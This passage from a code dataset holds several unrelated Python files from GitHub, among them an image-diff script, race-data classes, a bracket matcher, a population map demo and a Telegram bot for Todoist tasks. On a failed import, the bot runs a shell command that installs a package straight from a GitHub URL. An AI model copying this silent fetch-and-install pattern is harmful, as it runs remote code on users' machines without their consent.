data_type\n help += show_tables\n help += special_table\n help += select\n help += all_tables\n help += insert_db\n help += update_db\n help += delete_db\n\n print(help)\n\n\n############################################################################\n\nif __name__ == \"__main__\":\n sqlite_help()","repo_name":"saha-arjmand/monitoring_system","sub_path":"script_modules/subscript/db/sqlite_help/sqlite_help.py","file_name":"sqlite_help.py","file_ext":"py","file_size_in_byte":3686,"program_lang":"python","lang":"en","doc_type":"code","stars":5,"dataset":"github-code","pt":"31"} +{"seq_id":"24541449109","text":"import cv2\r\nfrom skimage.measure import compare_ssim\r\nimport numpy as np\r\nimport matplotlib.pyplot as plt\r\nimport matplotlib.image as imgs\r\nimport imutils\r\n\r\nOriginal = cv2.imread('origin_2.jpg')\r\nChanged = cv2.imread('aligned.jpg')\r\n\r\n# changed = cv2.resize(changed, (original.shape[1], original.shape[0]), interpolation=cv2.INTER_CUBIC)\r\n#original_gray = cv2.cvtColor(original, cv2.COLOR_BGR2GRAY)\r\n#changed_gray = cv2.cvtColor(changed, cv2.COLOR_BGR2GRAY)\r\n\r\nlower_gray = np.array([25, 25, 25], dtype = \"uint8\")\r\nupper_gray = np.array([151, 151, 151], dtype = \"uint8\")\r\nupper_gray_2 = np.array([185, 185, 185], dtype = \"uint8\")\r\n\r\nmask_1 = cv2.inRange(Original, lower_gray, upper_gray)\r\nmask_2 = cv2.inRange(Changed, lower_gray, upper_gray_2)\r\n\r\n# remove the background from the image\r\n\r\nmasked_image_1 = np.copy(Original)\r\nmasked_image_2 = np.copy(Changed)\r\nmasked_image_1[mask_1 != 0] = [0, 0, 0]\r\nmasked_image_2[mask_2 != 0] = [0, 0, 0]\r\n\r\n\r\ngreen = cv2.subtract(masked_image_1, masked_image_2)\r\n\r\nlower_green = np.array([0, 20, 30])\r\nupper_green = np.array([0, 100, 100])\r\n\r\n# convert the color to grayscale kont bgrab 7aga :D\r\noriginal_gray = cv2.cvtColor(Original, cv2.COLOR_BGR2GRAY)\r\nchanged_gray = cv2.cvtColor(Changed, cv2.COLOR_BGR2GRAY)\r\n\r\n# threshold byen mask1 wa mask2\r\n\r\nh, thresh = cv2.threshold(cv2.subtract(mask_1, mask_2), 200, 255, cv2.THRESH_BINARY)\r\ncnts = cv2.findContours(thresh.copy(), cv2.RETR_EXTERNAL, cv2.CHAIN_APPROX_SIMPLE)\r\ncnts = imutils.grab_contours(cnts)\r\n\r\nfor c in cnts:\r\n # compute the bounding box of the contour and then draw\r\n # bounding box on both input images to represent where the two\r\n\r\n c = max(cnts, key=cv2.contourArea)\r\n (x, y, w, h) = cv2.boundingRect(c)\r\n cv2.rectangle(Original, (x, y), (x + w, y + h), (0, 255, 0), 2)\r\n cv2.rectangle(Changed, (x, y), (x + w, y + h), (0, 255, 0), 2)\r\n\r\n\r\ncv2.imshow(\"original\", np.hstack([Original, Changed]))\r\n\r\ncv2.waitKey(0)\r\n","repo_name":"NadaAbbasMohamed/ROV-Competition","sub_path":"Task 1 - Color Detection Coral Reef Color Change/task_1.py","file_name":"task_1.py","file_ext":"py","file_size_in_byte":1940,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"31"} +{"seq_id":"6691507569","text":"import requests\r\n\r\nclass Carrera():\r\n def __init__(self, ronda, nombre_carrera, fecha_carrera, mapa, podio, asistencia, boletos_vendidos, mapa_vendidos):\r\n self.ronda = ronda\r\n self.nombre_carrera = nombre_carrera\r\n self.fecha_carrera = fecha_carrera\r\n self.mapa = mapa\r\n self.podio = podio\r\n self.asistencia = asistencia\r\n self.boletos_vendidos = boletos_vendidos\r\n self.mapa_vendidos = mapa_vendidos\r\n\r\n def leer_carrera():\r\n carrera_url = requests.get('https://raw.githubusercontent.com/Algorimtos-y-Programacion-2223-2/api-proyecto/main/races.json')\r\n carrera_url = carrera_url.json()\r\n lista_carrera=[]\r\n for x in carrera_url:\r\n carrera=Carrera(x['round'], x['name'], x['date'], x['map'], False, 0, 0, [])\r\n lista_carrera.append(carrera)\r\n return lista_carrera\r\n \r\n def mostrar_carrera(self):\r\n print(f' Ronda: {self.ronda}\\n Nombre de la carrera: {self.nombre_carrera}\\n Fecha de carrera: {self.fecha_carrera}\\n\\n\\n\\n')\r\n\r\n\r\nclass Circuito(Carrera):\r\n def __init__(self, ronda, nombre_carrera, fecha_carrera, mapa, podio, asistencia, boletos_vendidos, mapa_vendidos, id_circuito, nombre_circuito):\r\n super().__init__(ronda, nombre_carrera, fecha_carrera, mapa, podio, asistencia, boletos_vendidos, mapa_vendidos)\r\n self.id_circuito = id_circuito\r\n self.nombre_circuito = nombre_circuito\r\n\r\n def leer_circuito():\r\n carrera_url = requests.get('https://raw.githubusercontent.com/Algorimtos-y-Programacion-2223-2/api-proyecto/main/races.json')\r\n carrera_url = carrera_url.json()\r\n lista_circuito=[]\r\n for x in carrera_url:\r\n circ= x['circuit']\r\n circuito=Circuito(x['round'], x['name'], x['date'], x['map'], False, 0, 0, [], circ['circuitId'], circ['name'])\r\n lista_circuito.append(circuito)\r\n return lista_circuito\r\n \r\n def mostrar_circuito(self):\r\n print(f' Ronda: {self.ronda}\\n Nombre de la carrera: {self.nombre_carrera}\\n Fecha de carrera: {self.fecha_carrera}\\n ID de circuito: {self.id_circuito}\\n Nombre de circuito: {self.nombre_circuito}\\n\\n\\n\\n')\r\n \r\n\r\nclass Location(Circuito):\r\n def __init__(self, ronda, nombre_carrera, fecha_carrera, mapa, podio, asistencia, boletos_vendidos, mapa_vendidos, id_circuito, nombre_circuito, latitud, longitud, location_circuito, pais):\r\n super().__init__(ronda, nombre_carrera, fecha_carrera, mapa, podio, asistencia, boletos_vendidos, mapa_vendidos, id_circuito, nombre_circuito)\r\n self.latitud = latitud\r\n self.longitud = longitud\r\n self.location_circuito = location_circuito\r\n self.pais = pais\r\n \r\n def leer_location():\r\n carrera_url = requests.get('https://raw.githubusercontent.com/Algorimtos-y-Programacion-2223-2/api-proyecto/main/races.json')\r\n carrera_url = carrera_url.json()\r\n lista_location=[]\r\n for x in carrera_url:\r\n loc= x['circuit']['location']\r\n circ= x['circuit']\r\n location=Location(x['round'], x['name'], x['date'], x['map'], False, 0, 0, [], circ['circuitId'], circ['name'], loc['lat'], loc['long'], loc['locality'], loc['country'])\r\n lista_location.append(location)\r\n return lista_location\r\n \r\n def mostrar_location(self):\r\n print(f' Ronda: {self.ronda}\\n Nombre de la carrera: {self.nombre_carrera}\\n Fecha de carrera: {self.fecha_carrera}\\n ID de circuito: {self.id_circuito}\\n Nombre de circuito: {self.nombre_circuito}\\n Pais: {self.pais}\\n Localidad: {self.location_circuito}\\n Latitud: {self.latitud}\\n Longitud: {self.longitud}\\n\\n\\n\\n')\r\n \r\n\r\n\r\nclass Restaurante(Carrera):\r\n def __init__(self, ronda, nombre_carrera, fecha_carrera, mapa, podio, asistencia, boletos_vendidos, mapa_vendidos, nombre_restaurante):\r\n super().__init__(ronda, nombre_carrera, fecha_carrera, mapa, podio, asistencia, boletos_vendidos, mapa_vendidos)\r\n self.nombre_restaurante = nombre_restaurante\r\n\r\n def leer_restaurante():\r\n carrera_url = requests.get('https://raw.githubusercontent.com/Algorimtos-y-Programacion-2223-2/api-proyecto/main/races.json')\r\n carrera_url = carrera_url.json()\r\n lista_restaurante=[]\r\n for x in carrera_url:\r\n rest= x['restaurants']\r\n restaurante=Restaurante(x['round'], x['name'], x['date'], x['map'], False, 0, 0, [], rest['name'])\r\n lista_restaurante.append(restaurante)\r\n return lista_restaurante\r\n \r\n def mostrar_restaurante(self):\r\n print(f' Ronda: {self.ronda}\\n Nombre de la carrera: {self.nombre_carrera}\\n Fecha de carrera: {self.fecha_carrera}\\n Nombre de restaurante: {self.nombre_restaurante}\\n\\n\\n\\n')\r\n \r\n\r\n\r\n\r\n\r\n\r\nclass Producto(Restaurante):\r\n def __init__(self, ronda, nombre_carrera, fecha_carrera, mapa, podio, asistencia, boletos_vendidos, mapa_vendidos, nombre_restaurante, nombre_producto, tipo_producto, precio_producto):\r\n super().__init__(ronda, nombre_carrera, nombre_restaurante, fecha_carrera, mapa, podio, asistencia, boletos_vendidos, mapa_vendidos)\r\n self.nombre = nombre_producto\r\n self.tipo = tipo_producto\r\n self.precio = precio_producto\r\n\r\n def leer_producto():\r\n carrera_url = requests.get('https://raw.githubusercontent.com/Algorimtos-y-Programacion-2223-2/api-proyecto/main/races.json')\r\n carrera_url = carrera_url.json()\r\n lista_producto=[]\r\n for x in carrera_url:\r\n rest= x['restaurants']\r\n for r in rest:\r\n prod = r['items']\r\n for p in prod:\r\n producto=Producto(x['round'], x['name'], x['date'], x['map'], False, 0, 0, [], r['name'], p['name'], p['type'], p['price'])\r\n lista_producto.append(producto)\r\n return lista_producto\r\n\r\n\r\n\r\n\r\n def mostrar_producto(self):\r\n print(f' Nombre Restaurante: {self.nombre_restaurante}\\n Producto: {self.nombre_producto}\\n Tipo de producto: {self.tipo_producto}\\n Precio: {self.precio_producto}\\n\\n\\n\\n')\r\n ","repo_name":"GianmarcoCarniglia/proyecto","sub_path":"carrera.py","file_name":"carrera.py","file_ext":"py","file_size_in_byte":6135,"program_lang":"python","lang":"es","doc_type":"code","stars":0,"dataset":"github-code","pt":"31"} +{"seq_id":"35405325981","text":"def only_brackets(str):\n aim_list=[\"(\",\")\",\"[\",\"]\",\"{\",\"}\",\"<\",\">\"]\n str_list=list(str)\n result_list=[]\n for i in str_list :\n if i in aim_list:\n result_list.append(i)\n return \"\".join(result_list)\ndef is_valid(str):\n stack=[]\n parent_map={\")\":\"(\",\"]\":\"[\",\"}\":\"{\",\">\":\"<\"}\n for c in str:\n if c not in parent_map:\n stack.append(c)\n elif not stack or parent_map[c] !=stack.pop():\n return 0\n return not stack\nnum=input()\nresult=[]\nfor i in range(int(num)):\n lineinput=input()\n onlyBrackets=only_brackets(lineinput)\n answer=is_valid(onlyBrackets)\n result.append(int(answer))\nprint(*result)\n\n\n\n","repo_name":"WitcherOfFire/Codepractise","sub_path":"19括号匹配/19.py","file_name":"19.py","file_ext":"py","file_size_in_byte":680,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"31"} +{"seq_id":"35069638185","text":"#!/usr/bin/env python\n\ngroups = [\n 'Chloe',\n \"Antonio's\",\n 'Mikes',\n 'Korean Fried Chicken',\n 'Soban',\n \"Durk's\",\n 'Heng',\n 'Den Den Cafe',\n \"Harry's burger\",\n 'East Side pockets',\n 'Skewers',\n 'Wongs kitchen',\n 'Flatbread',\n 'Kabob and Curry',\n 'Bajas',\n 'Meeting Street Cafe',\n 'Yans cuisine'\n ]\n\niteration = 0\nrecurrence = 0\n\nwhile True:\n iteration += 1\n import random\n secure_random = random.SystemRandom()\n\n a = secure_random.choice(groups)\n b = random.choice(groups)\n c = random.choice(groups)\n d = secure_random.choice(groups)\n\n if a == b == c == d:\n recurrence += 1\n if recurrence == 2:\n print('After %s iterations, restaurant chosen is %s.' % (iteration, a))\n break\n","repo_name":"muammar/pickarestaurantforme","sub_path":"restaurants.py","file_name":"restaurants.py","file_ext":"py","file_size_in_byte":861,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"31"} +{"seq_id":"12877003685","text":"import json\nfrom streamlit_echarts import Map\nfrom streamlit_echarts import JsCode\nfrom streamlit_echarts import st_echarts\n\n\ndef render_usa():\n formatter = JsCode(\n \"function (params) {\"\n + \"var value = (params.value + '').split('.');\"\n + \"value = value[0].replace(/(\\d{1,3})(?=(?:\\d{3})+(?!\\d))/g, '$1,');\"\n + \"return params.seriesName + '
    ' + params.name + ': ' + value;}\"\n ).js_code\n\n with open(\"./data/USA.json\", \"r\") as f:\n map = Map(\n \"USA\",\n json.loads(f.read()),\n {\n \"Alaska\": {\"left\": -131, \"top\": 25, \"width\": 15},\n \"Hawaii\": {\"left\": -110, \"top\": 28, \"width\": 5},\n \"Puerto Rico\": {\"left\": -76, \"top\": 26, \"width\": 2},\n },\n )\n options = {\n \"title\": {\n \"text\": \"USA Population Estimates (2012)\",\n \"subtext\": \"Data from www.census.gov\",\n \"sublink\": \"http://www.census.gov/popest/data/datasets.html\",\n \"left\": \"right\",\n },\n \"tooltip\": {\n \"trigger\": \"item\",\n \"showDelay\": 0,\n \"transitionDuration\": 0.2,\n \"formatter\": formatter,\n },\n \"visualMap\": {\n \"left\": \"right\",\n \"min\": 500000,\n \"max\": 38000000,\n \"inRange\": {\n \"color\": [\n \"#313695\",\n \"#4575b4\",\n \"#74add1\",\n \"#abd9e9\",\n \"#e0f3f8\",\n \"#ffffbf\",\n \"#fee090\",\n \"#fdae61\",\n \"#f46d43\",\n \"#d73027\",\n \"#a50026\",\n ]\n },\n \"text\": [\"High\", \"Low\"],\n \"calculable\": True,\n },\n \"toolbox\": {\n \"show\": True,\n \"left\": \"left\",\n \"top\": \"top\",\n \"feature\": {\n \"dataView\": {\"readOnly\": False},\n \"restore\": {},\n \"saveAsImage\": {},\n },\n },\n \"series\": [\n {\n \"name\": \"USA PopEstimates\",\n \"type\": \"map\",\n \"roam\": True,\n \"map\": \"USA\",\n \"emphasis\": {\"label\": {\"show\": True}},\n \"textFixed\": {\"Alaska\": [20, -20]},\n \"data\": [\n {\"name\": \"Alabama\", \"value\": 4822023},\n {\"name\": \"Alaska\", \"value\": 731449},\n {\"name\": \"Arizona\", \"value\": 6553255},\n {\"name\": \"Arkansas\", \"value\": 2949131},\n {\"name\": \"California\", \"value\": 38041430},\n {\"name\": \"Colorado\", \"value\": 5187582},\n {\"name\": \"Connecticut\", \"value\": 3590347},\n {\"name\": \"Delaware\", \"value\": 917092},\n {\"name\": \"District of Columbia\", \"value\": 632323},\n {\"name\": \"Florida\", \"value\": 19317568},\n {\"name\": \"Georgia\", \"value\": 9919945},\n {\"name\": \"Hawaii\", \"value\": 1392313},\n {\"name\": \"Idaho\", \"value\": 1595728},\n {\"name\": \"Illinois\", \"value\": 12875255},\n {\"name\": \"Indiana\", \"value\": 6537334},\n {\"name\": \"Iowa\", \"value\": 3074186},\n {\"name\": \"Kansas\", \"value\": 2885905},\n {\"name\": \"Kentucky\", \"value\": 4380415},\n {\"name\": \"Louisiana\", \"value\": 4601893},\n {\"name\": \"Maine\", \"value\": 1329192},\n {\"name\": \"Maryland\", \"value\": 5884563},\n {\"name\": \"Massachusetts\", \"value\": 6646144},\n {\"name\": \"Michigan\", \"value\": 9883360},\n {\"name\": \"Minnesota\", \"value\": 5379139},\n {\"name\": \"Mississippi\", \"value\": 2984926},\n {\"name\": \"Missouri\", \"value\": 6021988},\n {\"name\": \"Montana\", \"value\": 1005141},\n {\"name\": \"Nebraska\", \"value\": 1855525},\n {\"name\": \"Nevada\", \"value\": 2758931},\n {\"name\": \"New Hampshire\", \"value\": 1320718},\n {\"name\": \"New Jersey\", \"value\": 8864590},\n {\"name\": \"New Mexico\", \"value\": 2085538},\n {\"name\": \"New York\", \"value\": 19570261},\n {\"name\": \"North Carolina\", \"value\": 9752073},\n {\"name\": \"North Dakota\", \"value\": 699628},\n {\"name\": \"Ohio\", \"value\": 11544225},\n {\"name\": \"Oklahoma\", \"value\": 3814820},\n {\"name\": \"Oregon\", \"value\": 3899353},\n {\"name\": \"Pennsylvania\", \"value\": 12763536},\n {\"name\": \"Rhode Island\", \"value\": 1050292},\n {\"name\": \"South Carolina\", \"value\": 4723723},\n {\"name\": \"South Dakota\", \"value\": 833354},\n {\"name\": \"Tennessee\", \"value\": 6456243},\n {\"name\": \"Texas\", \"value\": 26059203},\n {\"name\": \"Utah\", \"value\": 2855287},\n {\"name\": \"Vermont\", \"value\": 626011},\n {\"name\": \"Virginia\", \"value\": 8185867},\n {\"name\": \"Washington\", \"value\": 6897012},\n {\"name\": \"West Virginia\", \"value\": 1855413},\n {\"name\": \"Wisconsin\", \"value\": 5726398},\n {\"name\": \"Wyoming\", \"value\": 576412},\n {\"name\": \"Puerto Rico\", \"value\": 3667084},\n ],\n }\n ],\n }\n st_echarts(options, map=map)\n\n\nST_MAP_DEMOS = {\n \"Map: USA Population estimates\": (\n render_usa,\n \"https://echarts.apache.org/examples/en/editor.html?c=map-usa\",\n ),\n}\n","repo_name":"andfanilo/streamlit-echarts-demo","sub_path":"demo_echarts/map.py","file_name":"map.py","file_ext":"py","file_size_in_byte":5784,"program_lang":"python","lang":"en","doc_type":"code","stars":44,"dataset":"github-code","pt":"31"} +{"seq_id":"29646291613","text":"#! python3\n# -*- coding: utf-8 -*-\nimport os\ntry:\n from commands import *\nexcept ImportError:\n import os\n os.system(\"pip install git+https://github.com/egigoka/commands\")\n from commands import *\ntry:\n import telebot\nexcept ImportError:\n from commands.pip9 import Pip\n Pip.install(\"pytelegrambotapi\")\n import telebot\nfrom todoiste import *\nimport telegrame\n\n__version__ = \"1.8.0\"\n\nmy_chat_id = 5328715\nola_chat_id = 550959211\ntgx_chat_id = 619037205\n\n\nclass Arguments:\n pass\n\n\nclass State:\n def __init__(self):\n f = Path.safe__file__(os.path.split(__file__)[0])\n json_path = Path.combine(f, \"configs\", \"telegram_bot_todoist.json\")\n self.config_json = Json(json_path)\n\n self.getting_project_name = False\n self.getting_item_name = False\n\n class JsonList(list):\n def __init__(self, list_input, category, property):\n list.__init__(self, list_input)\n self.category = category\n self.property = property\n\n def append(self, obj):\n out = list.append(self, obj)\n self.save()\n return out\n\n def remove(self, obj):\n out = list.remove(self, obj)\n self.save()\n return out\n\n def save(self):\n State.config_json[self.category][self.property] = self\n State.config_json.save()\n\n def purge(self):\n while self:\n self.pop()\n self.save()\n\n try:\n self.excluded_projects = JsonList(self.config_json[\"excluded\"][\"projects\"], \"excluded\", \"projects\")\n except KeyError:\n self.excluded_projects = JsonList([], \"excluded\", \"projects\")\n try:\n self.excluded_items = JsonList(self.config_json[\"excluded\"][\"items\"], \"excluded\", \"items\")\n except KeyError:\n self.excluded_items = JsonList([], \"excluded\", \"items\")\n\n self.counter_for_left_items = True\n self.counter_for_left_items_int = 0\n\n self.counter_all_items = 0\n\n self.all_todo_str = \"\"\n self.last_todo_str = \"\"\n\n self.sent_messages = 1\n\n self.last_radnom_todo_str = \"not inited\"\n self.last_updated = 0\n\n\n\n\nState = State()\n\n\nencrypted_telegram_token = [-15, -21, -49, -16, -63, -52, -46, 6, -20, -13, -40, -6, -39, -33, 22, 0, 1, 51, 9, -26,\n -41, -24, 13, 4, 49, 44, -25, 18, 9, -18, -19, 72, -12, -26, -3, 3, -62, 3, 17, 4, 7, -3,\n -33, -3, -12]\n\nencrypted_todoist_token = [-20, -20, -50, -14, -61, -54, 2, 0, 32, 27, -51, -21, -54, -53, 4, 3, 29, -14, -51, 29, -10,\n -6, 1, 4, 28, 29, -55, -17, -59, -9, 2, 50, -13, -14, -52, -15, -56, -59, -44, 5]\n\ndef reset_password():\n password = Str.input_pass()\n GIV[\"api_password\"] = password\n return password\n\n\ntry:\n password = GIV[\"api_password\"]\n if \"reset\" in sys.argv:\n password = reset_password()\nexcept (NameError, KeyError):\n password = reset_password()\n\ntelegram_token = Str.decrypt(encrypted_telegram_token, password)\ntodoist_api_key = Str.decrypt(encrypted_todoist_token, password)\n\ndef get_random_todo(todo_api, telegram_api, chat_id):\n Print.rewrite(\"Getting random todo\")\n bench = Bench(prefix=\"Get random item in\", quiet=True)\n bench.start()\n incomplete_items = todo_api.all_incomplete_items_in_account()\n # Print.debug(Print.prettify(incomplete_items, quiet=True))\n bench.end()\n\n counter_for_left_items_int = 0\n counter_all_items = 0\n all_todo_str = \"\"\n\n for project_name, project_items in Dict.iterable(incomplete_items.copy()): # removing excluded\n counter_all_items += len(project_items)\n\n if project_name.strip() in State.excluded_projects:\n incomplete_items[project_name] = []\n continue\n if project_items:\n # print(f'\"{project_name}\"')\n all_todo_str += project_name + newline\n for item in project_items.copy():\n\n if item[\"content\"].strip() in State.excluded_items:\n incomplete_items[project_name].remove(item)\n # print(f' \"{item[\"content\"]}\" excluded')\n else:\n counter_for_left_items_int += 1\n # print(f' \"{item[\"content\"]}\"')\n all_todo_str += \" \" + item[\"content\"] + newline\n\n for project_name, project_items in Dict.iterable(incomplete_items.copy()): # removing empty projects\n if not project_items:\n incomplete_items.pop(project_name)\n\n # Print.debug(\"counter_for_left_items_int\", counter_for_left_items_int,\n # \"counter_all_items\", counter_all_items)\n # \"all_todo_str\", all_todo_str)\n State.counter_for_left_items_int = counter_for_left_items_int\n State.counter_all_items = counter_all_items\n State.all_todo_str = all_todo_str\n\n try:\n random_project_name, random_project_items = Random.item(incomplete_items)\n except IndexError:\n return \"All done!\"\n random_item = Random.item(random_project_items)\n\n try:\n if not random_item[\"due_date_utc\"].endswith(\"20:59:59 +0000\"):\n time_string = \" \" + random_item[\"date_string\"]\n except KeyError:\n time_string = \"\"\n\n if State.counter_for_left_items and telegram_api and chat_id:\n counter_for_left_items_str = f\"({State.counter_for_left_items_int}/{State.counter_all_items} left)\"\n telegrame.send_message(telegram_api, chat_id, f\"{counter_for_left_items_str} v{__version__}\")\n\n Print.rewrite()\n return f\"{random_item['content']} <{random_project_name}>{time_string}\".replace(\n \"> (\", \"> (\")\n\n\ndef todo_updater(todo_api, telegram_api, chat_id):\n if Time.delta(State.last_updated, Time.stamp()) < 3:\n Print(\"skip updating, thread already running\")\n return\n State.last_radnom_todo_str = get_random_todo(todo_api=todo_api, telegram_api=telegram_api, chat_id=chat_id)\n State.last_updated = Time.stamp()\n\n\ndef start_todoist_bot():\n todoist_api = Todoist(todoist_api_key)\n telegram_api = telebot.TeleBot(telegram_token, threaded=False)\n\n todo_updater(todoist_api, None, None) # initing for fist message, no chat_id\n\n @telegram_api.message_handler(content_types=[\"text\"])\n def reply_all_messages(message):\n\n def main_message():\n State.sent_messages = 1\n\n main_markup = telebot.types.ReplyKeyboardMarkup()\n main_button = telebot.types.KeyboardButton('MOAR!')\n settings_button = telebot.types.KeyboardButton('Settings')\n list_button = telebot.types.KeyboardButton('List')\n main_markup.row(main_button)\n main_markup.row(settings_button, list_button)\n\n if State.excluded_projects:\n excluded_str = f\"Excluded projects: {State.excluded_projects}.\"\n else:\n excluded_str = \"No excluded projects.\"\n if State.excluded_items:\n excluded_str += f\"{newline}Excluded items: {State.excluded_items}.\"\n else:\n excluded_str += f\"{newline}No excluded items.\"\n\n current_todo = State.last_radnom_todo_str\n telegrame.send_message(telegram_api, chat_id=message.chat.id,\n # text=f\"{excluded_str}{newline}{current_todo}\") # , reply_markup=main_markup)\n text=current_todo, reply_markup=main_markup)\n\n State.last_todo_str = Str.substring(current_todo, \"\", \"<\").strip()\n todo_updater_thread = MyThread(todo_updater, args=(todoist_api, telegram_api, message.chat.id), daemon=True, quiet=False)\n todo_updater_thread.start()\n\n if message.chat.id != my_chat_id:\n telegrame.send_message(telegram_api, message.chat.id, \"ACCESS DENY!\")\n return\n\n if State.getting_project_name:\n if message.text == \"Cancel\":\n pass\n else:\n message_text = message.text.strip()\n if message_text in State.excluded_projects:\n State.excluded_projects.remove(message_text)\n else:\n State.excluded_projects.append(message_text)\n State.getting_project_name = False\n main_message()\n\n elif State.getting_item_name:\n if message.text == \"Cancel\":\n pass\n else:\n message_text = message.text.strip()\n if message_text in State.excluded_items:\n State.excluded_items.remove(message_text)\n else:\n State.excluded_items.append(message_text)\n State.getting_item_name = False\n State._message = True\n main_message()\n\n elif message.text == \"MOAR!\": # MAIN MESSAGE\n main_message()\n\n elif message.text == \"List\":\n if not State.all_todo_str:\n get_random_todo(todoist_api, None, None)\n if State.all_todo_str:\n telegrame.send_message(telegram_api, message.chat.id, State.all_todo_str)\n else:\n telegrame.send_message(telegram_api, message.chat.id, \"Todo list for today is empty!\")\n\n elif message.text == \"Settings\":\n markup = telebot.types.ReplyKeyboardMarkup()\n project_exclude_button = telebot.types.KeyboardButton(\"Exclude project\")\n project_include_button = telebot.types.KeyboardButton(\"Include project\")\n\n items_exclude_button = telebot.types.KeyboardButton(\"Exclude items\")\n items_include_button = telebot.types.KeyboardButton(\"Include items\")\n\n clean_black_list_button = telebot.types.KeyboardButton(\"Clean black list\")\n counter_for_left_items_button = telebot.types.KeyboardButton(\"Toggle left items counter\")\n\n markup.row(project_exclude_button, project_include_button)\n markup.row(items_exclude_button, items_include_button)\n markup.row(clean_black_list_button)\n markup.row(counter_for_left_items_button)\n\n telegrame.send_message(telegram_api, message.chat.id, \"Settings:\", reply_markup=markup)\n\n elif message.text == \"Exclude project\":\n markup = telebot.types.ReplyKeyboardMarkup()\n for project_name, project_id in Dict.iterable(todoist_api.projects_all_names()):\n if project_name not in State.excluded_projects:\n project_button = telebot.types.KeyboardButton(project_name)\n markup.row(project_button)\n\n cancel_button = telebot.types.KeyboardButton(\"Cancel\")\n markup.row(cancel_button)\n\n telegrame.send_message(telegram_api, message.chat.id, \"Send me project name to exclude:\", reply_markup=markup)\n\n State.getting_project_name = True\n\n elif message.text == \"Include project\":\n if State.excluded_projects:\n markup = telebot.types.ReplyKeyboardMarkup()\n for project_name in State.excluded_projects:\n project_button = telebot.types.KeyboardButton(project_name)\n markup.row(project_button)\n\n cancel_button = telebot.types.KeyboardButton(\"Cancel\")\n markup.row(cancel_button)\n\n telegrame.send_message(telegram_api, message.chat.id, \"Send me project name to include:\", reply_markup=markup)\n\n State.getting_project_name = True\n else:\n telegrame.send_message(telegram_api, message.chat.id, \"No excluded projects, skip...\")\n main_message()\n\n elif message.text == \"Exclude items\":\n # main_markup = telebot.types.ForceReply(selective=False) it doesn't show up default keyboard :(\n\n markup = telebot.types.ReplyKeyboardMarkup()\n default_items = False\n default_items_list = [r\"Vacuum/sweep\", \"Wash the floor\"]\n if State.last_todo_str:\n default_items_list.append(State.last_todo_str)\n for item_name in default_items_list:\n if item_name not in State.excluded_items:\n project_button = telebot.types.KeyboardButton(item_name)\n markup.row(project_button)\n default_items = True\n\n if not default_items:\n project_button = telebot.types.KeyboardButton(\"Enter item manually\")\n markup.row(project_button)\n\n cancel_button = telebot.types.KeyboardButton(\"Cancel\")\n markup.row(cancel_button)\n\n telegrame.send_message(telegram_api, message.chat.id, \"Send me item name:\", reply_markup=markup)\n\n State.getting_item_name = True\n\n elif message.text == \"Include items\":\n if State.excluded_items:\n markup = telebot.types.ReplyKeyboardMarkup()\n for item_name in State.excluded_items:\n project_button = telebot.types.KeyboardButton(item_name)\n markup.row(project_button)\n\n cancel_button = telebot.types.KeyboardButton(\"Cancel\")\n markup.row(cancel_button)\n\n telegrame.send_message(telegram_api, message.chat.id, \"Send me item name:\", reply_markup=markup)\n\n State.getting_item_name = True\n else:\n telegrame.send_message(telegram_api, message.chat.id, \"No excluded items, skip...\")\n main_message()\n\n elif message.text == \"Clean black list\":\n State.excluded_items.purge()\n State.excluded_projects.purge()\n main_message()\n\n elif message.text == \"Toggle left items counter\":\n if State.counter_for_left_items:\n State.counter_for_left_items = False\n else:\n State.counter_for_left_items = True\n main_message()\n\n else:\n telegrame.send_message(telegram_api, message.chat.id, f\"ERROR! <{message.text}>\")\n State.sent_messages += 1\n main_message()\n\n telegram_api.polling(none_stop=True)\n # https://github.com/eternnoir/pyTelegramBotAPI/issues/273\n\n\ndef main():\n telegrame.very_safe_start_bot(start_todoist_bot)\n\n\nif __name__ == '__main__':\n main()\n","repo_name":"egigoka/telegram_bots","sub_path":"todoistbot.py","file_name":"todoistbot.py","file_ext":"py","file_size_in_byte":14411,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"31"} +{"seq_id":"22091875932","text":"\"\"\"\nScript to analyze the results of experiments.\n\"\"\"\n\nimport torch\nimport numpy as np\nimport matplotlib.pyplot as plt\nimport os\nimport argparse\n\ndef walk_experiments(fp):\n res = []\n for root, dirs, files in os.walk(fp):\n for f in files:\n if f == 'metrics.pt':\n res.append(os.path.join(root, f))\n return res\n\ndef make_rolling_metrics(metrics, rolling=30):\n rolling_metrics = {k:{kk:[] for kk in metrics[k].keys()} for k in metrics.keys()}\n for ek in rolling_metrics.keys():\n for mk in rolling_metrics[ek].keys():\n rolling_metrics[ek][mk] = torch.stack([metrics[ek][mk][i:-(rolling-i)] for i in range(rolling)], dim=0).mean(dim=0)\n\n return rolling_metrics\n\ndef make_plots(metrics, rolling=30, fig=None, axs=None):\n \"\"\"\n Make simple datapt-by-datapt plots of each metric. Assume that all metrics are on the same dataset and contain the same keys.\n \"\"\"\n N = len(list(metrics.values())[0].keys())\n h = 2\n w = int(N/h) + ((N%h)!=0)\n fig, axs = plt.subplots(h, w, figsize=(4 * w, 4 * h))\n axs = axs.flatten()\n\n #create shorter labels for readability\n short_keys = list(metrics.keys())\n prefix_idx = len(os.path.commonpath(short_keys)) + 1\n suffix_idx = len(os.path.commonpath([x[::-1] for x in short_keys])) + 1\n short_keys = [x[prefix_idx:-suffix_idx] for x in short_keys]\n\n for ei, (ek, ev) in enumerate(metrics.items()):\n for mi, (mk, mv) in enumerate(ev.items()):\n axs[mi].plot(mv, label=short_keys[ei])\n if ei == len(metrics.keys()) - 1:\n axs[mi].set_title(mk)\n if mi == 0:\n axs[mi].legend()\n\n return fig, axs\n\nif __name__ == '__main__':\n parser = argparse.ArgumentParser()\n parser.add_argument('--experiment_dir', type=str, required=True, help='dir contaning experiment metrics')\n args = parser.parse_args()\n\n fps = walk_experiments(args.experiment_dir)\n\n print('Generating results for:')\n for fp in fps:\n print('\\t' + fp)\n\n metrics = {k:torch.load(k) for k in fps}\n aggregate_metrics = {}\n for k in metrics.keys():\n print(k)\n for kk, vv in metrics[k].items():\n print('\\t{}:{:.4f}'.format(kk, vv.mean().item()))\n if kk not in aggregate_metrics.keys():\n aggregate_metrics[kk] = []\n aggregate_metrics[kk].append(vv.mean().item())\n\n print('_____________')\n for k,v in aggregate_metrics.items():\n d = torch.tensor(v)\n print(\"{}: {:.4f} +- {:.4f}\".format(k, d.mean(), 